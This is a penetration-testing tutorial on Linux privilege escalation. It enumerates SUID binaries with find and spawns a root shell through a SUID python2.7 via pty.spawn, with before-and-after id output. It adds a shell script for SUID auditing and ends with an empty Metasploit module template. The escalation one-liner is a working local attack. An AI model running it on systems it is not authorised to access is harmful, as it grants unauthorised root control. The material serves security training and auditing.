Searching for binaries for privilege escalation exploit

During the attacking phase of a pen test, once access has been gained to a shell, we can try to own the system through a privilege escalation exploit in order to obtain root access. First we confirm who we currently are: the id command prints the real and effective user and group IDs of the shell, which is the baseline we compare against after the escalation attempt:

$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Then we can use the following command to list the executable files on the system that have the SUID (set-user-ID) bit set, i.e. files that run with the privileges of their owner rather than of the user invoking them:

find / -perm -u=s -type f 2>/dev/null

Here, find searches from the root of the filesystem (/) for files whose mode includes the set-user-ID bit (-perm -u=s; the leading dash means "at least these bits", so files with additional bits still match) and restricts the results to regular files (-type f), not directories. The 2>/dev/null part redirects standard error (file descriptor 2) to the null device, so the "Permission denied" messages produced for directories we cannot read are discarded while the matching paths on standard output are kept.

Example shown below (this variant omits -type f, so it is not restricted to regular files):

$ find / -perm -u=s 2>/dev/null

Note that if the redirection were applied to stdout (> or 1>) instead of stderr (2>), the matching paths would be discarded and we would see only the list of permission denied errors. Suppose the listing from the above example includes /usr/bin/python2.7: a SUID-root interpreter lets us run arbitrary code as its owner, so we could use it in an attempt to gain root access. We can use the following command to achieve this in our example:

/usr/bin/python2.7 -c 'import pty;pty.spawn("/bin/sh")'

pty.spawn() is normally used to upgrade a reverse shell into a proper TTY; here the important point is that, because python2.7 carries the SUID bit, it runs with an effective UID of 0 and the /bin/sh it spawns inherits that effective UID. (If /bin/sh is bash rather than dash, bash resets the effective UID back to the real UID at startup unless it is invoked with -p, so the shell to spawn may need to be chosen accordingly.) The result should be a shell with root privileges, as the following commands show:

# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami

The shell now has root privileges: the real uid is still 1000(user), but the effective uid shown as euid=0(root) is what the kernel checks for file access, and whoami, which reports the effective user, prints root.
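The enumeration and checks described above, as an added example that is not part of the original write-up. It wraps the find one-liner in reusable functions and goes a little beyond the page: it also filters the SUID list against an allow-list of expected binaries (so an odd entry such as a SUID /usr/bin/python2.7 stands out) and reports each file's owner, since a SUID file owned by a non-root account only lets us become that account. The function names, the allow-list file format and the --run flag are assumptions for illustration; the only tools used are POSIX find, test, ls, grep and basename.

```shell
#!/bin/sh
# Added example (not from the original write-up): SUID enumeration helpers.
# Assumes a POSIX shell and a find(1) that accepts -perm -4000, the numeric
# equivalent of the -perm -u=s form used in the text.

# list_suid ROOT
# Print every regular file under ROOT whose set-user-ID bit is set, one
# path per line. Errors from unreadable directories go to /dev/null, as in
# the one-liner above; matching paths still arrive on stdout.
list_suid() {
  find "$1" -perm -4000 -type f 2>/dev/null
}

# has_suid PATH
# Exit status 0 if PATH exists and has the set-user-ID bit. This is the
# POSIX test(1) -u primary, handy for checking a single candidate binary.
has_suid() {
  [ -u "$1" ]
}

# unexpected_suid ROOT ALLOWLIST
# Print the SUID files under ROOT whose basename is not listed (one name
# per line) in the file ALLOWLIST. Feeding in the distribution's default
# SUID set (passwd, sudo, mount, ...) leaves only the odd ones out.
# (The allow-list format is an assumption of this example.)
unexpected_suid() {
  list_suid "$1" | while IFS= read -r path; do
    name=$(basename "$path")
    if ! grep -qx -- "$name" "$2"; then
      printf '%s\n' "$path"
    fi
  done
}

# suid_owner_report ROOT
# For each SUID file print "owner mode path". Field 3 of ls -ld is the
# owner and field 1 the mode string; the path is printed separately so
# names containing spaces do not corrupt the columns.
suid_owner_report() {
  list_suid "$1" | while IFS= read -r path; do
    set -- $(ls -ld "$path")
    printf '%s %s %s\n' "$3" "$1" "$path"
  done
}

# Walk the whole filesystem when invoked as "sh script.sh --run", which
# mirrors the original find / ... command with owner information added.
if [ "${1:-}" = "--run" ]; then
  suid_owner_report /
fi
```

The allow-list is the practitioner's shortcut: on a stock system almost every SUID binary is expected, and what matters is the handful that are not. Note that has_suid only inspects the mode bits; on a filesystem mounted nosuid the bit is still reported but the kernel ignores it at exec time, so a positive hit still needs to be confirmed by running the binary and checking euid as the text does.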

Metasploit Exploit Module Template (Ruby)

# This module requires Metasploit:
# Current source:

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
      'Description'    => %q{
        Say something that the user might need to know
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Name' ],
      'References'     =>
        [
          [ 'URL', '' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'System or software version',
            {
              'Ret' => 0x41414141 # This will be available in `target.ret`
            }
          ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Privileged'     => false,
      'DisclosureDate' => "",
      'DefaultTarget'  => 0))
  end

  def check
    # For the check command
  end

  def exploit
    # Main function
  end
end